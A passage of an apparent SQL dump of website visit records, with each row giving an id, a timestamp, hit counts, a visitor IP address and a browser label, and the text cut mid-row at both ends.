1665345829,1,1,0,0,'173.252.111.23','other'),(565732,1665348276,1,1,0,0,'205.210.31.176','other'),(565733,1665354641,1,1,0,0,'87.250.224.14','other'),(565734,1665358387,1,1,0,0,'51.81.196.131','firefox'),(565735,1665360427,1,1,0,0,'162.55.55.15','chrome'),(565736,1665368663,1,1,0,0,'87.250.224.100','other'),(565737,1665395384,1,1,0,0,'31.13.127.3','other'),(565738,1665413559,1,0,1,0,'66.249.66.59',''),(565739,1665422622,1,1,0,0,'66.249.66.61','chrome'),(565740,1665424827,1,1,0,0,'66.249.66.57','chrome'),(565741,1665424998,1,1,0,0,'194.38.20.161','other'),(565742,1665426693,1,0,1,0,'66.249.66.57',''),(565743,1665426834,1,1,0,0,'193.112.202.112','firefox'),(565744,1665426970,1,1,0,0,'87.250.224.100','other'),(565745,1665430568,2,1,1,0,'66.249.66.59',''),(565746,1665431137,1,0,1,0,'66.249.66.57',''),(565747,1665431791,1,0,1,0,'66.249.66.158',''),(565748,1665431914,1,1,0,0,'87.250.224.37','other'),(565749,1665431949,1,1,0,0,'95.108.213.68','other'),(565750,1665432495,1,1,0,0,'173.252.111.16','other'),(565751,1665433001,1,0,1,0,'66.249.66.57',''),(565752,1665446660,1,1,0,0,'20.39.197.30','chrome'),(565753,1665447534,1,0,1,0,'66.249.66.61',''),(565754,1665450773,1,1,0,0,'5.255.231.122','other'),(565755,1665453201,1,1,0,0,'66.249.66.57','chrome'),(565756,1665456311,1,1,0,0,'66.249.66.159','chrome'),(565757,1665462033,1,1,0,0,'5.255.253.124','other'),(565758,1665472235,1,0,1,0,'66.249.66.61',''),(565759,1665478855,1,1,0,0,'87.250.224.156','other'),(565760,1665479802,1,1,0,0,'207.46.13.38','other'),(565761,1665484926,1,1,0,0,'5.255.231.244','other'),(565762,1665491032,1,1,0,0,'20.163.141.249','other'),(565763,1665499874,1,0,1,0,'66.249.66.57',''),(565764,1665502351,1,1,0,0,'163.172.180.25','other'),(565765,1665515804,5,5,0,0,'3.133.150.135','chrome'),(565766,1665521888,1,1,0,0,'205.210.31.170','other'),(565767,1665522212,1,1,0,0,'87.250.224.107','other'),(565768,1665530769,46,46,0,0,'116.203.159.121','chrome'),(565769,1665536577,1,1,0,0,'198.235.24.154','other'),(565770,1665541187,1,0,1,0,'66.249.66.57',''),(565771,1665554112,1,1,0,0,'87.250.224.167','other'),(565772,1665555966,1,1,0,0,'66.249.66.57','chrome'),(565773,1665556298,1,1,0,0,'157.55.39.150','chrome'),(565774,1665556711,1,1,0,0,'194.38.20.161','other'),(565775,1665567537,1,1,0,0,'87.250.224.16','other'),(565776,1665586333,1,0,1,0,'66.249.66.57',''),(565777,1665588935,1,1,0,0,'34.64.218.102','firefox'),(565778,1665599013,1,1,0,0,'185.237.217.11','chrome'),(565779,1665601100,1,1,0,0,'199.244.88.226','chrome'),(565780,1665606767,1,1,0,0,'66.249.66.57','chrome'),(565781,1665609586,5,5,0,0,'20.19.251.9','chrome'),(565782,1665615434,1,0,1,0,'66.249.66.57',''),(565783,1665647586,41,41,0,0,'20.118.162.64','chrome'),(565784,1665647970,1,1,0,0,'66.249.66.57','chrome'),(565785,1665650409,1,1,0,0,'194.163.35.150','chrome'),(565786,1665652760,1,0,1,0,'66.249.66.61',''),(565787,1665658199,1,1,0,0,'51.158.98.24','other'),(565788,1665665201,22,22,0,0,'20.97.248.39','chrome'),(565789,1665667574,1,1,0,0,'194.38.20.161','other'),(565790,1665671572,1,1,0,0,'5.45.207.102','other'),(565791,1665673500,2,2,0,0,'41.250.74.94','chrome'),(565792,1665674474,1,1,0,0,'87.250.224.128','other'),(565793,1665674477,1,1,0,0,'87.250.224.160','other'),(565794,1665677353,6,6,0,0,'143.110.250.197','other'),(565795,1665685331,1,1,0,0,'185.237.217.11','chrome'),(565796,1665687097,1,0,1,0,'66.249.66.7',''),(565797,1665693054,1,1,0,0,'213.180.203.83','other'),(565798,1665702623,1,1,0,0,'198.235.24.25','other'),(565799,1665710043,1,1,0,0,'5.255.253.184','other'),(565800,1665719092,1,1,0,0,'31.144.133.57','chrome'),(565801,1665726092,1,1,0,0,'198.235.24.41','other'),(565802,1665749938,1,1,0,0,'91.203.110.254','chrome'),(565803,1665752586,1,1,0,0,'5.255.253.184','other'),(565804,1665755993,1,1,0,0,'167.99.72.252','other'),(565805,1665756394,1,1,0,0,'5.255.253.184','other'),(565806,1665757686,1,1,0,0,'157.55.39.150','other'),(565807,1665759499,1,1,0,0,'5.255.253.130','other'),(565808,1665763997,1,1,0,0,'198.12.250.252','firefox'),(565809,1665764108,1,1,0,0,'20.119.235.188','chrome'),(565810,1665771635,1,0,1,0,'66.249.66.57',''),(565811,1665772107,1,1,0,0,'5.45.207.102','other'),(565812,1665776599,1,1,0,0,'66.249.66.57','chrome'),(565813,1665777733,1,0,1,0,'66.249.66.59',''),(565814,1665779395,1,1,0,0,'198.235.24.9','other'),(565815,1665779726,6,6,0,0,'143.110.250.197','other'),(565816,1665784288,1,1,0,0,'66.249.66.57','chrome'),(565817,1665797703,1,1,0,0,'5.255.253.184','other'),(565818,1665799959,1,1,0,0,'66.249.66.59','chrome'),(565819,1665800781,1,0,1,0,'178.251.108.75',''),(565820,1665805878,1,1,0,0,'194.38.20.161','other'),(565821,1665811702,1,1,0,0,'5.255.253.184','other'),(565822,1665812077,1,1,0,0,'207.46.13.130','other'),(565823,1665817133,1,1,0,0,'185.181.60.12','chrome'),(565824,1665827405,1,1,0,0,'205.210.31.145','other'),(565825,1665830096,1,1,0,0,'35.90.236.188','chrome'),(565826,1665830135,2,2,0,0,'34.222.47.148','chrome'),(565827,1665830412,1,1,0,0,'35.89.120.249','chrome'),(565828,1665835621,1,1,0,0,'41.216.188.48','chrome'),(565829,1665851571,1,1,0,0,'205.210.31.50','other'),(565830,1665851892,1,1,0,0,'207.46.13.130','chrome'),(565831,1665858008,1,0,1,0,'66.249.79.147',''),(565832,1665862074,2,1,1,0,'66.249.66.57',''),(565833,1665866512,1,1,0,0,'5.255.253.131','other'),(565834,1665866547,1,1,0,0,'5.255.253.184','other'),(565835,1665870645,1,1,0,0,'41.216.188.48','chrome'),(565836,1665876946,1,1,0,0,'207.46.13.32','other'),(565837,1665880774,1,1,0,0,'64.246.161.42','firefox'),(565838,1665940505,1,1,0,0,'92.112.233.100','chrome'),(565839,1665944231,1,1,0,0,'192.151.156.187','chrome'),(565840,1665946256,1,0,1,0,'66.249.66.57',''),(565841,1665948355,30,30,0,0,'167.235.58.102','chrome'),(565842,1665953555,1,1,0,0,'91.229.23.136','other'),(565843,1665965976,2,2,0,0,'5.255.253.130','other'),(565844,1665966097,2,2,0,0,'5.45.207.102','other'),(565845,1665966106,1,1,0,0,'87.250.224.20','other'),(565846,1665966107,1,1,0,0,'87.250.224.160','other'),(565847,1665966109,1,1,0,0,'5.255.253.176','other'),(565848,1665966111,1,1,0,0,'87.250.224.156','other'),(565849,1665966113,1,1,0,0,'95.108.213.66','other'),(565850,1665966154,1,1,0,0,'5.255.253.151','other'),(565852,1665966157,1,1,0,0,'5.45.207.138','other'),(565853,1665966158,1,1,0,0,'5.45.207.139','other'),(565854,1665966508,1,1,0,0,'5.45.207.140','other'),(565855,1665966968,1,1,0,0,'5.255.253.155','other'),(565856,1665981399,1,1,0,0,'66.249.66.57','chrome'),(565857,1666001248,2,2,0,0,'35.89.6.234','chrome'),(565858,1666001285,2,2,0,0,'35.92.185.25','chrome'),(565859,1666019657,1,1,0,0,'66.249.66.59','chrome'),(565860,1666019767,1,1,0,0,'198.235.24.24','other'),(565861,1666023342,1,1,0,0,'66.249.66.59','chrome'),(565862,1666024584,1,0,1,0,'66.249.66.59',''),(565863,1666024586,1,1,0,0,'66.249.66.59','chrome'),(565864,1666028315,1,1,0,0,'66.249.66.59','chrome'),(565865,1666032729,1,1,0,0,'66.249.66.57','chrome'),(565866,1666039314,1,1,0,0,'207.46.13.163','chrome'),(565867,1666039643,1,1,0,0,'205.210.31.17','other'),(565868,1666043440,1,1,0,0,'66.249.66.57','chrome'),(565869,1666043647,1,1,0,0,'173.252.83.9','other'),(565870,1666044389,1,1,0,0,'66.249.66.57','chrome'),(565871,1666054639,1,1,0,0,'51.158.109.3','other'),(565872,1666066925,1,1,0,0,'66.249.66.57','chrome'),(565873,1666066975,1,1,0,0,'66.249.66.59','chrome'),(565874,1666067642,1,1,0,0,'194.38.20.161','other'),(565875,1666068350,1,1,0,0,'66.249.66.59','chrome'),(565876,1666079265,1,1,0,0,'66.249.66.57','chrome'),(565877,1666082500,1,1,0,0,'63.250.38.63','chrome'),(565878,1666085574,1,1,0,0,'66.249.66.59','chrome'),(565879,1666093544,1,0,1,0,'66.249.66.59',''),(565880,1666093853,1,1,0,0,'54.245.41.61','chrome'),(565881,1666093869,2,2,0,0,'52.88.112.218','chrome'),(565882,1666099528,1,1,0,0,'34.217.119.239','chrome'),(565883,1666099554,2,2,0,0,'34.216.76.63','chrome'),(565884,1666102698,1,1,0,0,'5.45.207.140','other'),(565885,1666107150,1,1,0,0,'20.86.98.172','chrome'),(565886,1666116487,1,1,0,0,'37.73.77.78','other'),(565887,1666120448,1,1,0,0,'173.252.107.6','other'),(565888,1666125327,10,10,0,0,'5.189.184.9','chrome'),(565889,1666126196,1,1,0,0,'66.249.66.57','chrome'),(565890,1666136900,5,5,0,0,'104.248.112.213','chrome'),(565891,1666149212,5,5,0,0,'18.119.111.205','chrome'),(565892,1666157643,1,1,0,0,'205.210.31.5','other'),(565893,1666158315,1,1,0,0,'178.133.158.250','chrome'),(565894,1666163638,1,1,0,0,'66.249.66.57','chrome'),(565895,1666165036,1,1,0,0,'66.249.66.57','chrome'),(565896,1666178244,1,1,0,0,'87.250.224.20','other'),(565897,1666180306,1,1,0,0,'20.39.197.30','chrome'),(565898,1666192547,1,0,1,0,'66.249.66.57',''),(565899,1666193582,1,1,0,0,'194.38.20.161','other'),(565900,1666210152,1,0,1,0,'66.249.66.59',''),(565901,1666210218,1,1,0,0,'139.59.20.111','firefox'),(565902,1666216235,1,1,0,0,'66.249.66.59','chrome'),(565903,1666221519,2,2,0,0,'104.248.47.126','chrome'),(565904,1666221520,1,1,0,0,'104.248.47.126','other'),(565905,1666224781,1,1,0,0,'95.108.213.6','other'),(565906,1666227756,1,1,0,0,'66.249.66.59','chrome'),(565907,1666228603,1,1,0,0,'66.249.66.61','chrome'),(565908,1666232104,1,0,1,0,'66.249.66.57',''),(565909,1666234969,1,1,0,0,'66.249.66.57','chrome'),(565910,1666236056,2,2,0,0,'20.216.165.140','chrome'),(565911,1666236168,1,1,0,0,'3.87.44.55','chrome'),(565912,1666237319,17,17,0,0,'20.216.165.140','firefox'),(565913,1666237561,1,1,0,0,'95.108.213.57','other'),(565914,1666240481,48,48,0,0,'20.216.165.140','other'),(565915,1666240487,11,11,0,0,'20.216.165.140','chrome'),(565916,1666246925,1,1,0,0,'66.249.66.57','chrome'),(565917,1666249116,1,0,1,0,'66.249.66.59',''),(565918,1666251070,1,1,0,0,'66.249.66.59','chrome'),(565919,1666253779,2,0,2,0,'66.249.66.59',''),(565920,1666254134,1,1,0,0,'66.249.66.59','chrome'),(565921,1666254468,1,1,0,0,'5.255.253.120','other'),(565922,1666256417,1,1,0,0,'66.249.66.57','chrome'),(565923,1666256420,1,1,0,0,'66.249.66.61','chrome'),(565924,1666259520,1,1,0,0,'69.63.184.116','other'),(565925,1666262340,1,0,1,0,'66.249.66.61',''),(565926,1666262469,1,1,0,0,'66.249.66.59','chrome'),(565927,1666264479,1,0,1,0,'66.249.66.59',''),(565928,1666276515,1,1,0,0,'66.249.66.57','chrome'),(565929,1666278079,1,1,0,0,'66.249.66.61','chrome'),(565930,1666279927,1,1,0,0,'66.249.66.57','chrome'),(565931,1666286255,1,1,0,0,'31.13.127.10','other'),(565932,1666288700,2,2,0,0,'194.38.20.161','other'),(565933,1666289744,1,1,0,0,'34.212.104.150','chrome'),(565934,1666289745,1,1,0,0,'34.215.179.46','chrome'),(565935,1666289754,2,2,0,0,'35.167.17.127','chrome'),(565936,1666289757,2,2,0,0,'54.187.115.54','chrome'),(565937,1666292012,1,0,1,0,'66.249.66.61',''),(565938,1666293842,1,0,1,0,'66.249.66.57',''),(565939,1666294076,1,0,1,0,'66.249.66.61',''),(565940,1666294252,1,1,0,0,'66.249.66.61','chrome'),(565941,1666295802,1,1,0,0,'66.249.66.59','chrome'),(565942,1666297880,1,1,0,0,'66.249.66.61','chrome'),(565943,1666297974,1,1,0,0,'66.249.66.59','chrome'),(565944,1666299268,2,2,0,0,'66.249.66.57','chrome'),(565945,1666307989,1,1,0,0,'66.249.66.57','chrome'),(565946,1666310768,1,1,0,0,'5.255.253.155','other'),(565947,1666310789,1,1,0,0,'5.45.207.102','other'),(565948,1666317082,1,1,0,0,'66.249.66.57','chrome'),(565949,1666334144,1,1,0,0,'91.196.178.112','other'),(565950,1666347554,1,1,0,0,'95.108.213.25','other'),(565951,1666353388,1,1,0,0,'205.210.31.183','other'),(565952,1666357472,3,3,0,0,'147.78.47.249','chrome'),(565953,1666377562,1,1,0,0,'68.69.184.202','other'),(565954,1666379935,1,1,0,0,'172.105.42.19','firefox'),(565955,1666380262,1,0,1,0,'66.249.66.57',''),(565956,1666392869,1,1,0,0,'205.210.31.39','other'),(565957,1666413612,1,1,0,0,'173.252.83.120','other'),(565958,1666450220,1,1,0,0,'35.86.107.213','chrome'),(565959,1666450222,1,1,0,0,'34.219.245.96','chrome'),(565960,1666450237,2,2,0,0,'35.92.165.127','chrome'),(565961,1666450240,1,1,0,0,'54.200.218.114','chrome'),(565962,1666460752,1,1,0,0,'150.95.112.79','firefox'),(565963,1666466688,1,0,1,0,'66.249.66.57',''),(565964,1666471506,1,1,0,0,'207.46.13.180','other'),(565965,1666472695,1,1,0,0,'192.151.156.187','chrome'),(565966,1666477809,4,4,0,0,'35.206.153.39','chrome'),(565967,1666479344,4,4,0,0,'34.222.127.214','firefox'),(565968,1666482945,1,1,0,0,'207.46.13.180','chrome'),(565969,1666505980,1,1,0,0,'87.250.224.96','other'),(565970,1666518468,1,1,0,0,'87.250.224.47','other'),(565971,1666535181,2,2,0,0,'20.173.96.195','chrome'),(565972,1666536308,1,1,0,0,'198.235.24.178','other'),(565973,1666540182,1,1,0,0,'176.108.106.21','chrome'),(565974,1666540720,1,1,0,0,'95.108.213.65','other'),(565975,1666553076,1,0,1,0,'66.249.66.57',''),(565976,1666554941,1,1,0,0,'54.218.178.30','chrome'),(565977,1666557449,1,1,0,0,'198.235.24.158','other'),(565978,1666559473,1,1,0,0,'185.181.60.39','chrome'),(565979,1666562485,1,0,1,0,'66.249.66.57',''),(565980,1666563091,2,2,0,0,'20.105.168.98','chrome'),(565981,1666572554,1,1,0,0,'68.69.184.202','other'),(565982,1666583061,1,1,0,0,'157.90.159.161','chrome'),(565983,1666587512,1,1,0,0,'95.108.213.25','other'),(565984,1666606752,1,1,0,0,'207.46.13.180','other'),(565985,1666608725,1,1,0,0,'207.46.13.180','chrome'),(565986,1666611312,1,1,0,0,'95.108.213.25','other'),(565987,1666611416,1,1,0,0,'198.235.24.43','other'),(565988,1666628000,1,1,0,0,'157.55.39.65','chrome'),(565989,1666629824,1,1,0,0,'205.210.31.143','other'),(565990,1666633167,1,1,0,0,'151.80.20.26','firefox'),(565991,1666639518,1,0,1,0,'66.249.66.59',''),(565992,1666667830,1,1,0,0,'20.58.1.27','chrome'),(565993,1666675119,1,1,0,0,'68.69.184.202','other'),(565994,1666681973,1,1,0,0,'66.249.66.57','chrome'),(565995,1666713522,1,1,0,0,'66.249.66.61','chrome'),(565996,1666716918,1,1,0,0,'207.46.13.180','other'),(565997,1666720842,1,1,0,0,'66.249.66.59','chrome'),(565998,1666722117,1,1,0,0,'45.76.76.121','other'),(565999,1666725971,1,0,1,0,'66.249.66.57',''),(566000,1666728653,1,1,0,0,'173.252.111.120','other'),(566001,1666733984,3,3,0,0,'147.78.47.249','chrome'),(566002,1666740098,1,1,0,0,'66.249.66.57','chrome'),(566003,1666744064,2,2,0,0,'87.250.224.79','other'),(566004,1666751569,1,1,0,0,'205.210.31.56','other'),(566005,1666756741,1,1,0,0,'66.249.66.61','chrome'),(566006,1666758920,1,1,0,0,'198.235.24.184','other'),(566007,1666760165,1,1,0,0,'213.180.203.88','other'),(566008,1666767085,1,1,0,0,'87.250.224.79','other'),(566009,1666773936,1,1,0,0,'188.214.106.71','other'),(566010,1666777300,1,1,0,0,'213.180.203.88','other'),(566011,1666779660,1,1,0,0,'87.250.224.192','other'),(566012,1666789595,1,1,0,0,'87.250.224.32','other'),(566013,1666792576,1,1,0,0,'5.255.253.136','other'),(566014,1666802245,1,1,0,0,'103.36.19.166','chrome'),(566015,1666804852,1,1,0,0,'54.188.76.143','chrome'),(566016,1666804886,2,2,0,0,'34.216.77.240','chrome'),(566017,1666809969,1,1,0,0,'49.51.134.238','firefox'),(566018,1666812316,1,0,1,0,'66.249.70.37',''),(566019,1666836535,7,7,0,0,'4.224.251.156','other'),(566020,1666841954,22,22,0,0,'20.163.64.57','chrome'),(566021,1666851165,5,5,0,0,'75.119.200.132','chrome'),(566022,1666862633,1,1,0,0,'5.255.253.171','other'),(566023,1666872635,1,1,0,0,'66.249.66.82','chrome'),(566024,1666891807,1,1,0,0,'157.55.39.65','chrome'),(566025,1666893618,1,0,1,0,'66.249.66.59',''),(566026,1666897262,1,0,1,0,'66.249.66.82',''),(566027,1666900144,1,1,0,0,'199.244.88.223','chrome'),(566028,1666902729,1,1,0,0,'103.74.120.192','firefox'),(566029,1666906878,2,2,0,0,'87.250.224.79','other'),(566030,1666906992,1,1,0,0,'5.45.207.65','other'),(566031,1666912164,6,6,0,0,'139.59.107.179','other'),(566032,1666914064,1,1,0,0,'5.161.96.57','chrome'),(566033,1666914590,1,1,0,0,'87.250.224.79','other'),(566034,1666917927,1,1,0,0,'5.45.207.65','other'),(566035,1666919620,1,1,0,0,'54.200.206.215','chrome'),(566036,1666930769,2,2,0,0,'66.249.66.82','chrome'),(566037,1666932885,1,1,0,0,'66.249.66.83','chrome'),(566038,1666942174,1,1,0,0,'5.45.207.148','other'),(566039,1666942628,1,0,1,0,'66.249.66.83',''),(566040,1666958234,5,5,0,0,'20.24.21.64','chrome'),(566041,1666966758,1,1,0,0,'185.182.57.84','chrome'),(566042,1666972922,1,1,0,0,'66.249.66.82','chrome'),(566043,1666983409,1,0,1,0,'66.249.66.84',''),(566044,1666985944,1,1,0,0,'207.46.13.180','chrome'),(566045,1666993609,1,1,0,0,'87.250.224.79','other'),(566046,1666996146,6,6,0,0,'139.59.107.179','other'),(566047,1667019790,1,1,0,0,'205.210.31.184','other'),(566048,1667049574,4,4,0,0,'109.70.108.10','chrome'),(566049,1667054396,2,2,0,0,'20.224.34.102','chrome'),(566050,1667064758,1,1,0,0,'66.249.66.59','chrome'),(566051,1667069612,1,1,0,0,'173.252.83.1','other'),(566052,1667069883,1,0,1,0,'66.249.66.207',''),(566053,1667070049,1,0,1,0,'66.249.66.209',''),(566054,1667083325,1,1,0,0,'5.255.253.171','other'),(566055,1667084242,1,1,0,0,'66.249.66.83','chrome'),(566056,1667084410,1,0,1,0,'66.249.66.59',''),(566057,1667095989,1,1,0,0,'66.249.66.57','chrome'),(566058,1667097785,1,1,0,0,'68.69.184.202','other'),(566059,1667098265,1,1,0,0,'20.232.204.110','firefox'),(566060,1667099250,1,1,0,0,'66.249.66.83','chrome'),(566061,1667099454,1,1,0,0,'66.249.66.207','chrome'),(566062,1667102663,1,1,0,0,'66.249.66.83','chrome'),(566063,1667114969,1,1,0,0,'192.64.113.147','firefox'),(566064,1667135421,1,1,0,0,'205.210.31.21','other'),(566065,1667136324,1,1,0,0,'20.106.121.144','chrome'),(566066,1667137235,1,1,0,0,'20.106.121.144','chrome'),(566067,1667138180,1,1,0,0,'20.106.121.144','chrome'),(566068,1667139127,1,1,0,0,'20.106.121.144','chrome'),(566069,1667142922,1,0,1,0,'66.249.66.209',''),(566070,1667151208,1,1,0,0,'87.250.224.102','other'),(566071,1667156283,1,0,1,0,'66.249.66.57',''),(566072,1667160482,1,1,0,0,'66.249.66.61','chrome'),(566073,1667160984,1,1,0,0,'176.120.105.253','chrome'),(566074,1667164703,1,1,0,0,'183.136.225.44','firefox'),(566075,1667166442,1,1,0,0,'157.55.39.65','other'),(566076,1667168827,1,0,1,0,'66.249.66.159',''),(566077,1667173553,3,3,0,0,'147.78.47.249','chrome'),(566078,1667174765,1,1,0,0,'207.46.13.180','chrome'),(566079,1667176582,1,1,0,0,'207.46.13.180','chrome'),(566080,1667178855,1,1,0,0,'87.250.224.32','other'),(566081,1667180496,1,1,0,0,'207.46.13.180','other'),(566082,1667187391,1,1,0,0,'68.69.184.202','other'),(566083,1667191929,1,1,0,0,'87.250.224.32','other'),(566084,1667194802,1,1,0,0,'66.249.66.82','chrome'),(566085,1667202459,1,1,0,0,'66.249.66.84','chrome'),(566086,1667204833,1,0,1,0,'66.249.66.83',''),(566087,1667207551,8,8,0,0,'168.63.59.135','chrome'),(566088,1667208309,1,1,0,0,'35.92.173.167','chrome'),(566089,1667208360,1,1,0,0,'34.212.36.52','chrome'),(566090,1667208389,1,1,0,0,'54.189.218.102','chrome'),(566091,1667208405,2,2,0,0,'34.217.67.115','chrome'),(566092,1667216676,1,0,1,0,'66.249.66.209',''),(566093,1667217044,1,0,1,0,'66.249.66.82',''),(566094,1667218315,1,1,0,0,'198.235.24.176','other'),(566095,1667233505,1,1,0,0,'77.88.5.28','other'),(566096,1667238208,1,0,1,0,'66.249.66.57',''),(566097,1667238212,1,1,0,0,'66.249.66.59','chrome'),(566098,1667242319,1,1,0,0,'77.88.5.9','other'),(566099,1667242849,1,0,1,0,'66.249.66.59',''),(566100,1667244231,1,1,0,0,'66.249.66.59','chrome'),(566101,1667245017,1,1,0,0,'77.88.5.161','other'),(566102,1667246110,1,1,0,0,'77.88.5.9','other'),(566103,1667253289,1,1,0,0,'173.252.111.13','other'),(566104,1667257118,1,0,1,0,'66.249.66.59',''),(566105,1667268017,1,1,0,0,'68.69.184.202','other'),(566106,1667270901,1,1,0,0,'66.249.66.57','chrome'),(566107,1667280059,1,1,0,0,'77.88.5.161','other'),(566108,1667283109,2,2,0,0,'51.89.255.212','chrome'),(566109,1667291364,1,1,0,0,'77.88.5.9','other'),(566110,1667292528,1,1,0,0,'77.88.5.9','other'),(566111,1667296945,1,1,0,0,'35.92.131.139','chrome'),(566112,1667296947,1,1,0,0,'54.201.255.192','chrome'),(566113,1667296967,2,2,0,0,'34.220.98.78','chrome'),(566114,1667297009,1,1,0,0,'54.188.211.235','chrome'),(566115,1667301036,1,1,0,0,'157.55.39.65','chrome'),(566116,1667305096,1,1,0,0,'66.249.66.59','chrome'),(566117,1667305543,1,1,0,0,'66.249.66.61','chrome'),(566118,1667305941,2,2,0,0,'3.228.219.171','chrome'),(566119,1667312056,1,1,0,0,'66.249.66.57','chrome'),(566120,1667317166,1,1,0,0,'66.249.66.57','chrome'),(566121,1667317189,6,6,0,0,'3.228.219.171','other'),(566122,1667321712,1,1,0,0,'185.183.122.143','firefox'),(566123,1667324582,1,1,0,0,'77.88.5.9','other'),(566124,1667325636,2,2,0,0,'3.228.219.171','chrome'),(566125,1667325720,1,1,0,0,'77.88.5.212','other'),(566126,1667325757,1,1,0,0,'77.88.5.9','other'),(566127,1667326254,1,1,0,0,'185.237.217.11','chrome'),(566128,1667327583,1,1,0,0,'77.88.5.9','other'),(566129,1667329279,1,0,1,0,'66.249.66.61',''),(566130,1667331522,1,1,0,0,'185.26.122.72','firefox'),(566131,1667331529,1,1,0,0,'77.88.5.9','other'),(566132,1667332671,1,0,1,0,'66.249.66.57',''),(566133,1667350124,6,6,0,0,'3.228.219.171','other'),(566134,1667350884,5,5,0,0,'3.21.186.241','chrome'),(566135,1667356013,1,1,0,0,'157.55.39.65','chrome'),(566136,1667359543,1,0,1,0,'66.249.66.57',''),(566137,1667364366,1,1,0,0,'207.46.13.180','chrome'),(566138,1667364426,1,1,0,0,'198.235.24.28','other'),(566139,1667366130,1,1,0,0,'66.249.66.61','chrome'),(566140,1667373321,1,1,0,0,'185.181.60.39','chrome'),(566141,1667378978,1,0,1,0,'66.249.66.59',''),(566142,1667380581,1,1,0,0,'93.158.161.57','other'),(566143,1667386181,1,1,0,0,'194.44.133.167','chrome'),(566144,1667395960,1,1,0,0,'20.25.83.103','chrome'),(566145,1667396531,1,1,0,0,'66.249.66.57','chrome'),(566146,1667396894,1,0,1,0,'66.249.66.59',''),(566147,1667403410,1,1,0,0,'5.75.130.221','chrome'),(566148,1667415046,1,1,0,0,'77.88.5.9','other'),(566149,1667420788,1,0,1,0,'66.249.66.57',''),(566150,1667424638,1,1,0,0,'103.43.148.75','firefox'),(566151,1667425509,2,2,0,0,'66.249.66.59','chrome'),(566152,1667426712,1,1,0,0,'66.249.66.61','chrome'),(566153,1667429997,2,2,0,0,'66.249.66.61','chrome'),(566154,1667430395,2,0,2,0,'66.249.66.59',''),(566155,1667430415,1,0,1,0,'66.249.66.57',''),(566156,1667432111,1,0,1,0,'66.249.66.61',''),(566157,1667444934,1,1,0,0,'66.249.66.149','chrome'),(566158,1667451217,1,0,1,0,'66.249.66.57',''),(566159,1667468926,1,1,0,0,'77.88.5.9','other'),(566160,1667471381,1,1,0,0,'66.249.66.59','chrome'),(566161,1667475587,1,0,1,0,'66.249.66.59',''),(566162,1667476250,1,0,1,0,'66.249.66.57',''),(566163,1667476410,1,1,0,0,'66.249.66.61','chrome'),(566164,1667477911,1,1,0,0,'66.249.66.59','chrome'),(566165,1667479532,1,1,0,0,'66.249.66.61','chrome'),(566166,1667487450,1,1,0,0,'66.249.66.57','chrome'),(566167,1667499119,1,1,0,0,'77.88.5.161','other'),(566168,1667501514,1,1,0,0,'66.249.66.61','chrome'),(566169,1667505411,1,1,0,0,'66.249.66.57','chrome'),(566170,1667506001,1,0,1,0,'66.249.66.61',''),(566171,1667512567,1,1,0,0,'77.88.5.9','other'),(566172,1667512635,1,1,0,0,'66.249.66.57','chrome'),(566173,1667516370,2,2,0,0,'66.249.66.61','chrome'),(566174,1667520927,1,0,1,0,'66.249.66.59',''),(566175,1667523837,1,1,0,0,'157.55.39.220','other'),(566176,1667532670,1,1,0,0,'66.249.66.59','chrome'),(566177,1667533483,2,2,0,0,'66.249.66.57','chrome'),(566178,1667537309,1,1,0,0,'66.249.66.61','chrome'),(566179,1667551823,1,1,0,0,'66.249.66.59','chrome'),(566180,1667554713,1,1,0,0,'77.88.5.9','other'),(566181,1667555814,1,1,0,0,'176.108.120.2','chrome'),(566182,1667557436,1,1,0,0,'77.88.5.5','other'),(566183,1667560551,3,3,0,0,'77.88.5.9','other'),(566184,1667573549,1,1,0,0,'46.211.14.100','other'),(566185,1667579676,1,1,0,0,'66.249.66.57','chrome'),(566186,1667582494,1,1,0,0,'77.88.5.9','other'),(566187,1667583551,1,1,0,0,'190.145.68.131','firefox'),(566188,1667585903,1,1,0,0,'173.252.83.17','other'),(566189,1667586037,1,1,0,0,'207.46.13.161','chrome'),(566190,1667592361,1,0,1,0,'66.249.66.59',''),(566191,1667593355,1,1,0,0,'77.88.5.236','other'),(566192,1667603063,1,1,0,0,'52.72.187.166','other'),(566193,1667603067,1,1,0,0,'174.129.126.199','chrome'),(566194,1667603069,1,1,0,0,'44.203.38.98','chrome'),(566195,1667604136,1,1,0,0,'173.252.87.19','other'),(566196,1667607571,1,1,0,0,'77.88.5.9','other'),(566197,1667630589,1,1,0,0,'77.88.5.161','other'),(566198,1667633735,4,4,0,0,'165.22.236.45','chrome'),(566199,1667633736,1,1,0,0,'165.22.236.45','other'),(566200,1667637096,1,1,0,0,'207.46.13.161','other'),(566201,1667640921,1,1,0,0,'207.46.13.157','chrome'),(566202,1667641503,1,1,0,0,'34.212.135.16','chrome'),(566203,1667641536,1,1,0,0,'35.164.234.220','chrome'),(566204,1667641551,1,1,0,0,'52.24.59.182','chrome'),(566205,1667641578,1,1,0,0,'34.209.66.238','chrome'),(566206,1667643031,2,2,0,0,'185.81.157.186','firefox'),(566207,1667648654,1,1,0,0,'93.158.161.57','other'),(566208,1667655474,1,1,0,0,'185.182.56.82','chrome'),(566209,1667674170,1,1,0,0,'77.88.5.9','other'),(566210,1667677064,1,0,1,0,'66.249.66.59',''),(566211,1667680157,2,2,0,0,'162.142.125.210','other'),(566212,1667695730,1,1,0,0,'64.246.165.160','firefox'),(566213,1667696278,1,1,0,0,'207.46.13.153','chrome'),(566214,1667709589,1,1,0,0,'77.88.5.9','other'),(566215,1667735083,1,1,0,0,'77.88.5.5','other'),(566216,1667737534,1,1,0,0,'87.249.132.148','chrome'),(566217,1667757498,1,1,0,0,'69.171.249.10','other'),(566218,1667763430,1,0,1,0,'66.249.70.39',''),(566219,1667763883,1,1,0,0,'207.46.13.153','other'),(566220,1667765028,1,1,0,0,'66.249.70.39','chrome'),(566221,1667770052,1,1,0,0,'207.46.13.161','chrome'),(566222,1667770135,1,1,0,0,'173.252.107.5','other'),(566223,1667770188,1,1,0,0,'31.13.127.28','other'),(566224,1667789384,1,1,0,0,'93.158.161.36','other'),(566225,1667797181,1,1,0,0,'185.181.60.39','chrome'),(566226,1667816925,1,1,0,0,'68.69.184.202','other'),(566227,1667826265,1,1,0,0,'185.237.217.11','chrome'),(566228,1667840671,1,1,0,0,'66.249.65.211','chrome'),(566229,1667842597,1,1,0,0,'109.234.164.218','firefox'),(566230,1667849930,1,0,1,0,'66.249.65.207',''),(566231,1667852648,4,4,0,0,'167.248.133.120','other'),(566232,1667853373,1,1,0,0,'31.13.127.20','other'),(566233,1667859720,1,1,0,0,'134.209.45.225','other'),(566234,1667868492,1,1,0,0,'134.122.8.63','other'),(566235,1667893191